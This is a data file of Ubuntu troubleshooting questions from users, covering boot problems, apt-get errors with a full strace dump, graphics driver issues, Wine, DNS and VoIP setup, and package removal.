521966	no option to install lubuntu from usb on a ubuntu system	i have a netbook ( asus eee pc 1001p ) running ubuntu 13.10 . i want to install lubuntu 14.04 on it . i downloaded the lubuntu iso and used unetbootin ( on my newer laptop , running ubuntu 14.04 ) to create a bootable usb with the iso file . but when i start the netbook with the usb stick plugged in , it just boots straight into ubuntu 13.10 . holding down shift shows the grub menu , but the usb system is not listed there . i also tried creating the usb with the same iso file and usb-creator-gtk , with the same result ( the usb seems invisible to the netbook during boot ) . the usb mounts fine on the netbook once ubuntu is already loaded . any ideas ?
521967	how to find out what an action is called in gimp 's batch image manipulation ?	i want to both zealous crop and remove image transparency for a bunch of files . i know how to start the batch job and i was able to find the action plug-in-zealouscrop for -- duh -- zeahlous crop . yet i can not seem to find the correct gimp procedure name for remvoving transparency . i tried doing the action manually and looking in the journal , but it also does not reveal much specifics .
521969	is it safe to remove runit package ?	i just upgraded my ubuntu box from 12.04 lst to 14.04 lts . now apt-get tells me : the following package was automatically installed and is no longer required : runit use 'apt-get autoremove ' to remove it . is it really safe to remove this package ? dpkg-query -l runit shows me a list of iles that look pretty important to me ... thanks for the advice , massimo
521970	problem installing ubuntu in a windows 8	after installation of ubuntu and boot the pc , , ubuntu do not start i change in the bios to start with the hard-drive so it could recognize the hard-drive and not the usb installer but it do not find the hard-drive , the installation says is ok and finds no error so could it be the hard drive sata problem ? ? i have never had problems installing ubuntu before and i think windows did something that makes it difficult for changing the system to ubuntu.somebody can help me with this ? , thanks
521979	unable to successfully launch practice exam test generator using wine	i have just recenetly downloaded the following training kit which includes ebooks , practice tests and much more : mcitp self-paced training kit exams 70-640 , 70-642 , 70-643 , 70-647 windows server 2008 enterprise administrator core requirements . before i go any further let me point out that i am a ubuntu n00b . i am also running ubuntu 14.04 with kde desktop installed and i boot to kde rather then unity as it runs much smoother on my pc . anyways once i mounted the .iso file contained in the mcitp training kit and was able to browse all of the data contained on the .iso including a startcd.exe , i then did some searching on how to launch and install executable files and then downloaded and installed wine 1.7 via software-center after adding required repository as directed on winehq.com . i then successfuly installed wine and was able to launch the startcd.exe from my mounted .iso , i was also able to install 2 of the 4 ( that i tried ) practice test engines with no issues . i then browsed to where wine is configure to install to ( /home/korky/.wine/dosdevices/c : /program files/microsoft press training kit exam prep/ ) and found a mslocalware.exe file . when attempting to launch this file i receive the following error : `` an unexpected error has occurred in the application.retrieveuser '' i click ok and the application caontinues to launch . once in the application however i am unable to perform any of the normal functions it appears it is not loading the practice tests and the `` start test '' options are greyed out . any idea whats causing this and how i can fix this issue ?
521980	weird screen tearing behaviour with scrolling after updating nvidia drivers	so i updated my self to the latest stable nvidia driver . it is 340.32 version . i am using ubuntu 14.04 with it . everything is fine but if i try to scroll in some programs like for instance gedit or just the ubuntu software center , then some weird behavior happens . here is a link to a recording of the problem : https : //www.dropbox.com/s/bdszhpa8uivmmhb/20140909_172712.mp4 ? dl=0 the quality is not the best but you can see that i only scroll down one time and then the screen in gedit starts to move up and down and also some graphical anomalies appear . this problem does not happen with chromium and games for instance . but stuff like gedit is bugged for me . has anyone else experienced this ? what could fix it ?
521983	is it possible to have both libav and ffmpeg installed and running on ubuntu 14.04 ?	i want to use clementine but it needs ffmpeg to be installed if i want to play .ape files from it . on the other way , i still want to have vlc up and running , and i understand that vlc does no longer use ffmpeg , but libav . ( by the way , vlc plays all audio formats i have , including .ape files ) . so , my question is : if i install ffmpeg , will libav still be operacional ( thus allowing me to use vlc ) , or will it override libav funcionality , thus causing vlc to fail ? the reason i 'm asking this here instead of simply trying to install ffmpeg is because the last time i installed it vlc stoped working and i only could get it working again reinstalling ubuntu 14.04
521984	can not access the internet on ubuntu 13.04	my system shows that the usb modem i use has made a successful connection to the internet , but thereafter there seems to be no connection at all . so the os shows me that i am connected to the internet , but i can not access any webpage because i am basically online . however , i can access the internet when i am using windows 8 . any idea why this might be happening ? i need to access the internet on ubuntu to download software and stuff . thanks in advance .
521985	apt-get update says e : sub-process returned an error code	i am getting this error whenever i try and run any apt-get command . currently i am trying to run sudo apt-get update . i have also noticed that the /var/lib/apt/lists is empty . how can i repopulate this directory with the needed files that show the installed applications ? is there a boot repair cd i can use or something to fix this ? i get the following error when i try to run apt-get update , sudo apt-get update [ sudo ] password for preston : e : sub-process returned an error code i am using ubuntu 13.10 after running the command that @ muru posted below this is the output : $ sudo strace apt-get update [ sudo ] password for preston : sorry , try again . [ sudo ] password for preston : execve ( `` /usr/bin/apt-get '' , [ `` apt-get '' , `` update '' ] , [ /* 14 vars */ ] ) = 0 brk ( 0 ) = 0x245e000 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) mmap ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c90000 access ( `` /etc/ld.so.preload '' , r_ok ) = -1 enoent ( no such file or directory ) open ( `` /etc/ld.so.cache '' , o_rdonly|o_cloexec ) = 3 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=47071 , ... } ) = 0 mmap ( null , 47071 , prot_read , map_private , 3 , 0 ) = 0x7f5971c84000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /usr/lib/x86_64-linux-gnu/libapt-pkg.so.4.12 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\240\24\3\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=1287048 , ... } ) = 0 mmap ( null , 3383888 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5971735000 mprotect ( 0x7f597186a000 , 2097152 , prot_none ) = 0 mmap ( 0x7f5971a6a000 , 20480 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x135000 ) = 0x7f5971a6a000 mmap ( 0x7f5971a6f000 , 592 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0x7f5971a6f000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /usr/lib/x86_64-linux-gnu/libstdc++.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\300\265\5\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=979056 , ... } ) = 0 mmap ( null , 3159072 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5971431000 mprotect ( 0x7f5971517000 , 2093056 , prot_none ) = 0 mmap ( 0x7f5971716000 , 40960 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0xe5000 ) = 0x7f5971716000 mmap ( 0x7f5971720000 , 82976 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0x7f5971720000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libgcc_s.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\360*\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=88408 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c83000 mmap ( null , 2184224 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f597121b000 mprotect ( 0x7f5971230000 , 2093056 , prot_none ) = 0 mmap ( 0x7f597142f000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x14000 ) = 0x7f597142f000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libc.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\360\36\2\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0755 , st_size=1853400 , ... } ) = 0 mmap ( null , 3961912 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5970e53000 mprotect ( 0x7f5971010000 , 2097152 , prot_none ) = 0 mmap ( 0x7f5971210000 , 24576 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1bd000 ) = 0x7f5971210000 mmap ( 0x7f5971216000 , 17464 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0x7f5971216000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libutil.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\20\17\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=10680 , ... } ) = 0 mmap ( null , 2105624 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5970c50000 mprotect ( 0x7f5970c52000 , 2093056 , prot_none ) = 0 mmap ( 0x7f5970e51000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1000 ) = 0x7f5970e51000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libdl.so.2 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\320\16\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=14664 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c82000 mmap ( null , 2109736 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5970a4c000 mprotect ( 0x7f5970a4f000 , 2093056 , prot_none ) = 0 mmap ( 0x7f5970c4e000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x2000 ) = 0x7f5970c4e000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libz.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\0\36\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=100728 , ... } ) = 0 mmap ( null , 2195784 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5970833000 mprotect ( 0x7f597084b000 , 2093056 , prot_none ) = 0 mmap ( 0x7f5970a4a000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x17000 ) = 0x7f5970a4a000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libbz2.so.1.0 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\220\23\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=66600 , ... } ) = 0 mmap ( null , 2161864 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f5970623000 mprotect ( 0x7f5970632000 , 2093056 , prot_none ) = 0 mmap ( 0x7f5970831000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0xe000 ) = 0x7f5970831000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libm.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\0t\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=1063328 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c81000 mmap ( null , 3158344 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f597031f000 mprotect ( 0x7f5970422000 , 2093056 , prot_none ) = 0 mmap ( 0x7f5970621000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x102000 ) = 0x7f5970621000 close ( 3 ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c80000 mmap ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c7e000 arch_prctl ( arch_set_fs , 0x7f5971c7e740 ) = 0 mprotect ( 0x7f5971210000 , 16384 , prot_read ) = 0 mprotect ( 0x7f5970621000 , 4096 , prot_read ) = 0 mprotect ( 0x7f5970831000 , 4096 , prot_read ) = 0 mprotect ( 0x7f5970a4a000 , 4096 , prot_read ) = 0 mprotect ( 0x7f5970c4e000 , 4096 , prot_read ) = 0 mprotect ( 0x7f5970e51000 , 4096 , prot_read ) = 0 mprotect ( 0x7f597142f000 , 4096 , prot_read ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c7d000 mprotect ( 0x7f5971716000 , 32768 , prot_read ) = 0 mprotect ( 0x7f5971a6a000 , 16384 , prot_read ) = 0 mprotect ( 0x632000 , 4096 , prot_read ) = 0 mprotect ( 0x7f5971c92000 , 4096 , prot_read ) = 0 munmap ( 0x7f5971c84000 , 47071 ) = 0 brk ( 0 ) = 0x245e000 brk ( 0x247f000 ) = 0x247f000 open ( `` /dev/null '' , o_wronly|o_creat|o_trunc , 0666 ) = 3 open ( `` /usr/lib/locale/locale-archive '' , o_rdonly|o_cloexec ) = 4 fstat ( 4 , { st_mode=s_ifreg|0644 , st_size=1607664 , ... } ) = 0 mmap ( null , 1607664 , prot_read , map_private , 4 , 0 ) = 0x7f5971af4000 close ( 4 ) = 0 stat ( `` /var/lib/apt/ . `` , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /etc/apt/apt.conf.d/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /etc/apt/apt.conf.d/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 open ( `` /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache '' , o_rdonly ) = 4 fstat ( 4 , { st_mode=s_ifreg|0644 , st_size=26258 , ... } ) = 0 mmap ( null , 26258 , prot_read , map_shared , 4 , 0 ) = 0x7f5971c89000 close ( 4 ) = 0 openat ( at_fdcwd , `` /etc/apt/apt.conf.d/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 4 getdents ( 4 , /* 17 entries */ , 32768 ) = 592 getdents ( 4 , /* 0 entries */ , 32768 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/00cdmountpoint '' , o_rdonly ) = 4 read ( 4 , `` acquire : :cdrom { \n mount \ '' /media '' ... , 8191 ) = 82 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/00aptitude '' , o_rdonly ) = 4 read ( 4 , `` aptitude : :get-root-command \ '' sudo '' ... , 8191 ) = 49 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/00trustcdrom '' , o_rdonly ) = 4 read ( 4 , `` apt : :authentication : :trustcdrom `` ... , 8191 ) = 40 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/01autoremove '' , o_rdonly ) = 4 read ( 4 , `` apt\n { \n neverautoremove\n { \n\t\ '' ^f '' ... , 8191 ) = 350 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/01autoremove-kernels '' , o_rdonly ) = 4 read ( 4 , `` // file autogenerated by /etc/ke '' ... , 8191 ) = 642 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/05aptitude '' , o_rdonly ) = 4 read ( 4 , `` aptitude : :keep-unused-pattern \ '' ^ '' ... , 8191 ) = 157 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/10periodic '' , o_rdonly ) = 4 read ( 4 , `` apt : :periodic : :update-package-li '' ... , 8191 ) = 129 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/15update-stamp '' , o_rdonly ) = 4 read ( 4 , `` apt : :update : :post-invoke-success '' ... , 8191 ) = 108 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/20apt-show-versions '' , o_rdonly ) = 4 read ( 4 , `` // when apt 's cache is updated ( `` ... , 8191 ) = 164 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/20archive '' , o_rdonly ) = 4 read ( 4 , `` apt : :archives : :maxage \ '' 30\ '' ; \napt : '' ... , 8191 ) = 85 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/20auto-upgrades '' , o_rdonly ) = 4 read ( 4 , `` apt : :periodic : :update-package-li '' ... , 8191 ) = 80 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/20changelog '' , o_rdonly ) = 4 read ( 4 , `` // server information for apt-ch '' ... , 8191 ) = 123 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/50unattended-upgrades '' , o_rdonly ) = 4 read ( 4 , `` // automatically upgrade package '' ... , 8191 ) = 2138 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/70debconf '' , o_rdonly ) = 4 read ( 4 , `` // pre-configure all packages wi '' ... , 8191 ) = 182 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 open ( `` /etc/apt/apt.conf.d/99update-notifier '' , o_rdonly ) = 4 read ( 4 , `` dpkg : :post-invoke { \ '' if [ -d /var '' ... , 8191 ) = 231 read ( 4 , `` '' , 8191 ) = 0 close ( 4 ) = 0 stat ( `` /etc/apt/apt.conf '' , 0x7fff8619bb50 ) = -1 enoent ( no such file or directory ) stat ( `` /var/lib/dpkg/status '' , { st_mode=s_ifreg|0644 , st_size=1252691 , ... } ) = 0 stat ( `` /usr/bin/dpkg '' , { st_mode=s_ifreg|0755 , st_size=257632 , ... } ) = 0 stat ( `` /etc/debian_version '' , { st_mode=s_ifreg|0644 , st_size=11 , ... } ) = 0 stat ( `` '' , 0x7fff8619bbd0 ) = -1 enoent ( no such file or directory ) getuid ( ) = 0 ioctl ( 1 , sndctl_tmr_timebase or sndrv_timer_ioctl_next_device or tcgets , { b38400 opost isig icanon echo ... } ) = 0 rt_sigaction ( sigpipe , { sig_ign , [ pipe ] , sa_restorer|sa_restart , 0x7f5970e89ff0 } , { sig_dfl , [ ] , 0 } , 8 ) = 0 rt_sigaction ( sigwinch , { 0x409fd0 , [ winch ] , sa_restorer|sa_restart , 0x7f5970e89ff0 } , { sig_dfl , [ ] , 0 } , 8 ) = 0 ioctl ( 1 , tiocgwinsz , { ws_row=54 , ws_col=211 , ws_xpixel=0 , ws_ypixel=0 } ) = 0 stat ( `` /etc/apt/sources.list '' , 0x7fff8619b570 ) = -1 enoent ( no such file or directory ) stat ( `` /etc/apt/sources.list.d/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /etc/apt/sources.list.d/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /etc/apt/sources.list.d/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 openat ( at_fdcwd , `` /etc/apt/sources.list.d/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 4 getdents ( 4 , /* 2 entries */ , 32768 ) = 48 getdents ( 4 , /* 0 entries */ , 32768 ) = 0 close ( 4 ) = 0 stat ( `` /var/lib/apt/lists/partial/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /var/cache/apt/archives/partial/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 open ( `` /var/lib/apt/lists/lock '' , o_rdwr|o_creat|o_nofollow , 0640 ) = 4 fcntl ( 4 , f_setfd , fd_cloexec ) = 0 fcntl ( 4 , f_setlk , { type=f_wrlck , whence=seek_set , start=0 , len=0 } ) = 0 fstat ( 1 , { st_mode=s_ifchr|0620 , st_rdev=makedev ( 136 , 0 ) , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f5971c88000 ) = 2 stat ( `` /var/lib/apt/lists/ '' , { st_mode=s_ifdir|0755 , st_size=12288 , ... } ) = 0 openat ( at_fdcwd , `` /var/lib/apt/lists/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 5 getcwd ( `` /home/preston '' , 298 ) = 14 chdir ( `` /var/lib/apt/lists/ '' ) = 0 getdents ( 5 , /* 4 entries */ , 32768 ) = 104 getdents ( 5 , /* 0 entries */ , 32768 ) = 0 close ( 5 ) = 0 chdir ( `` /home/preston/ '' ) = 0 stat ( `` /var/lib/apt/lists/partial/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 openat ( at_fdcwd , `` /var/lib/apt/lists/partial/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 5 getcwd ( `` /home/preston '' , 298 ) = 14 chdir ( `` /var/lib/apt/lists/partial/ '' ) = 0 getdents ( 5 , /* 2 entries */ , 32768 ) = 48 getdents ( 5 , /* 0 entries */ , 32768 ) = 0 close ( 5 ) = 0 chdir ( `` /home/preston/ '' ) = 0 clone ( child_stack=0 , flags=clone_child_cleartid|clone_child_settid|sigchld , child_tidptr=0x7f5971c7ea10 ) = 11800 wait4 ( 11800 , [ { wifexited ( s ) & & wexitstatus ( s ) == 100 } ] , 0 , null ) = 11800 -- - sigchld { si_signo=sigchld , si_code=cld_exited , si_pid=11800 , si_status=100 , si_utime=0 , si_stime=0 } -- - rt_sigaction ( sigquit , { sig_dfl , [ quit ] , sa_restorer|sa_restart , 0x7f5970e89ff0 } , { sig_dfl , [ ] , 0 } , 8 ) = 0 rt_sigaction ( sigint , { sig_dfl , [ int ] , sa_restorer|sa_restart , 0x7f5970e89ff0 } , { sig_dfl , [ ] , 0 } , 8 ) = 0 close ( 4 ) = 0 stat ( `` /var/cache/apt/pkgcache.bin '' , 0x7fff8619b510 ) = -1 enoent ( no such file or directory ) stat ( `` /var/cache/apt/srcpkgcache.bin '' , 0x7fff8619b510 ) = -1 enoent ( no such file or directory ) stat ( `` /var/cache/apt/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /var/cache/apt/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 openat ( at_fdcwd , `` /var/cache/apt/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 4 getdents ( 4 , /* 3 entries */ , 32768 ) = 80 stat ( `` /var/cache/apt/archives '' , { st_mode=s_ifdir|0755 , st_size=69632 , ... } ) = 0 getdents ( 4 , /* 0 entries */ , 32768 ) = 0 close ( 4 ) = 0 stat ( `` /var/cache/apt/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` /var/cache/apt/ '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 openat ( at_fdcwd , `` /var/cache/apt/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 4 getdents ( 4 , /* 3 entries */ , 32768 ) = 80 stat ( `` /var/cache/apt/archives '' , { st_mode=s_ifdir|0755 , st_size=69632 , ... } ) = 0 getdents ( 4 , /* 0 entries */ , 32768 ) = 0 close ( 4 ) = 0 open ( `` /var/lib/dpkg/lock '' , o_rdwr|o_creat|o_nofollow , 0640 ) = 4 fcntl ( 4 , f_setfd , fd_cloexec ) = 0 fcntl ( 4 , f_setlk , { type=f_wrlck , whence=seek_set , start=0 , len=0 } ) = 0 openat ( at_fdcwd , `` /var/lib/dpkg/updates/ '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 5 getdents ( 5 , /* 2 entries */ , 32768 ) = 48 getdents ( 5 , /* 0 entries */ , 32768 ) = 0 close ( 5 ) = 0 close ( 4 ) = 0 write ( 2 , `` e '' , 1e ) = 1 write ( 2 , `` : `` , 2 : ) = 2 write ( 2 , `` sub-process returned an error co '' ... , 34sub-process returned an error code ) = 34 write ( 2 , `` \n '' , 1 ) = 1 close ( 3 ) = 0 exit_group ( 100 ) = ? +++ exited with 100 +++
521986	upgrading from 12.04 to 14.04	i use a program called pdf viewer . it works nice on 12.04 . when we upgrade pdf viewer it crashes when we try to save a page . contacted the supplier and they sent me an upgrade . it still crashes . they suggested an upgrade of wine . still crashes looks like i will stay with 12.04 or 13.04 works ok with the program any suggestions ?
521987	getting black screen every time after loging in to ubuntu 14.04	i am facing problem , whenever i am opening ubuntu 14.04 , i am getting black screen , after which i only have to press : alt+print screen+r e i s u b my system is dell xps l502x , with nvidia graphics card 525m . sudo apt-get update other commands , like upgrade . but everytime an error is comming . this issue is related to update of graphics driver which got mismatched with my graphics card . instead of reinstalling ubuntu 14.04 again , is there something can be done . for your notice , it is different from this and related to this but where is terminal . i have never ever installed nvidia graphics driver .
521988	problem with recursive queries	when i test my domain through http : //www.intodns.com , i see errors like this : i follow this tutorial : https : //www.digitalocean.com/community/tutorials/how-to-configure-bind-as-a-caching-or-forwarding-dns-server-on-ubuntu-14-04 but still the same problem occurs .
521990	jitsi not logging to asterisk from ubuntu with sip	i 'm trying to use the jitsi client to connect with sip to an asterisk server . if i give my account name , i get a password error ; if i give my extension , i get a time out . i can log in with the extension from a windows jitsi client with the same parameters . all software have been installed in the last few days with the last versions ( jitsi 2.4.4997 and 2.5.5065 on ubuntu , jitsi 2.4.4997 on windows ) , asterisk 11.12 compiled from source ) . i tried with and without firewall results are the same . both ubuntu and windoz computers are on the same network . could it be a problem with an external library ? any idea ? tia greg
521994	screen resolution on windows 8.1 virtualbox guest ( ubuntu host )	in virtualbox on ubuntu 14.04 i have a windows 8.1 guest , and i would like to change the screen resolution to 1440x900 . currently it is at 1152x864 ( that 's the max i can have it that will fit on my screen without scrollbars ) . the maximum resolution is 1600x1200 , but that would be too large . i have installed the extension pack . i am running this all on a system76 ratel with sufficient specs ( 16gb ram , intel i7 , haswell graphics , crucial ssd ) and everything is compatible as well .
521995	how to uninstall zentyal ?	i have installed zentyal 3.5 from ppa on a fresh ubuntu 14.04 . after a few tests i want to uninstall zentyal . there are no instructions to do it : ( i erased zentyal ppa and sudo apt-get remove zentyal-* but now network manager does n't work no more my ubuntu does n't get dhcp address more how to have a fresh ubuntu 14.04 ? tia roberto
521997	remove systemd components in ubuntu 14.04	is it possible to remove all installed components of systemd ( may the inventors r. i. p. ) in ubuntu 14.04 and replace them with ... well , how it was before ? if so , which packages are to be purged and which installed in their stead ?
521999	which graphic card driver is safer ?	i have an asus laptop with hybrid graphic card . several days ago i installed nvidia driver and now for time to time i change my graphic card preference ( by nvidia-prime ) between intel and geforce . i want to see is there any other way to make this automatic to not spend so much time for selecting the graphic card ? i 've tried bumblebee , but i really have problem on working with it .
522000	ubuntu hanging on boot	started ubuntu 14.04 dual-boot ( win7 ) , receive a lot of text . here 's a photo : i am unable to hard shutdown , since something in the crash is not allowing the power button to respond ; i 've held it for at least 30 seconds . i 'm sitting here waiting for the unfortunately long-lasting battery to run out so i can use my computer once again .
522003	nano edit , permission denied	i am trying to edit a index.php by using sudo nano index.php . nano opens me into index.php , then i add the code into the file , save and try to exit but it says permission denied . i am using ssh session in terminal and also amazon web services ... i am signed in on an ubuntu @ ipaddress . any help ?
522004	dependency problems after updating to 14.04 ?	i ca n't seem to install or uninstall anything after updating to 14.04 because emacs and latex was broken . i think i removed all the corrupt latex files , but the emacs ones wo n't go away . anyone know how to solve this problem ? reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libcanna1g use 'apt-get autoremove ' to remove it . the following new packages will be installed : emacs 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 9 not fully installed or removed . need to get 1,624 b of archives . after this operation , 25.6 kb of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ trusty/main emacs all 45.0ubuntu1 [ 1,624 b ] fetched 1,624 b in 0s ( 45.3 kb/s ) selecting previously unselected package emacs . ( reading database ... 255502 files and directories currently installed . ) preparing to unpack ... /emacs_45.0ubuntu1_all.deb ... unpacking emacs ( 45.0ubuntu1 ) ... setting up emacsen-common ( 2.0.7 ) ... install emacsen-common for emacs23 emacsen-common : handling install of emacsen flavor emacs23 /usr/lib/emacsen-common/packages/install/emacsen-common : 29 : /usr/lib/emacsen-common/packages/install/emacsen-common : emacs23 : not found error : install script from emacsen-common package failed no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . 